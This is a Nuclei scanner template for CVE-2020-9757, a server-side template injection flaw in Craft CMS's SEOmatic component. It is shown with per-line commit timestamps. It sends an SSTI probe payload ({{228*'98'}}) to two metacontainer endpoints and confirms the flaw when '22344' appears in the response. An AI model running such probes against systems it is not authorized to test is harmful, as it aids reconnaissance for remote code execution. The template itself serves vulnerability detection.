2021-01-02 04:56:15 +00:00
id : CVE-2020-9757
2020-07-03 17:56:51 +00:00
info :
2022-04-21 21:16:41 +00:00
name : Craft CMS < 3.3.0 - Server-Side Template Injection
2020-07-03 17:56:51 +00:00
author : dwisiswant0
2022-05-17 09:18:12 +00:00
severity : critical
2022-04-22 10:38:41 +00:00
description : Craft CMS before 3.3.0 is susceptible to server-side template injection via the SEOmatic component that could lead to remote code execution via malformed data submitted to the metacontainers controller.
2023-09-06 12:22:36 +00:00
remediation : |
Upgrade Craft CMS to version 3.3.0 or higher to mitigate this vulnerability.
2021-09-10 11:26:40 +00:00
reference :
- https://github.com/nystudio107/craft-seomatic/blob/v3/CHANGELOG.md
- https://github.com/giany/CVE/blob/master/CVE-2020-9757.txt
- https://github.com/nystudio107/craft-seomatic/commit/65ab659cb6c914c7ad671af1e417c0da2431f79b
- https://github.com/nystudio107/craft-seomatic/commit/a1c2cad7e126132d2442ec8ec8e9ab43df02cc0f
2022-04-21 21:16:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-9757
2022-04-22 10:38:41 +00:00
classification :
2022-05-17 09:18:12 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
2022-04-22 10:38:41 +00:00
cve-id : CVE-2020-9757
cwe-id : CWE-74
2023-10-14 11:27:55 +00:00
epss-score : 0.96999
epss-percentile : 0.99646
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:craftcms:craft_cms:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : craftcms
product : craft_cms
tags : cve,cve2020,ssti
2020-07-03 17:56:51 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-03 17:56:51 +00:00
- method : GET
path :
2020-07-07 08:39:32 +00:00
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
2021-10-06 23:53:20 +00:00
skip-variables-check : true
2023-07-11 19:49:27 +00:00
2020-07-03 17:56:51 +00:00
matchers-condition : and
matchers :
- type : word
2023-07-11 19:49:27 +00:00
part : body
2020-07-03 17:56:51 +00:00
words :
- "MetaLinkContainer"
- "canonical"
2020-07-07 08:39:32 +00:00
- "22344"
2020-07-03 17:56:51 +00:00
condition : and
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200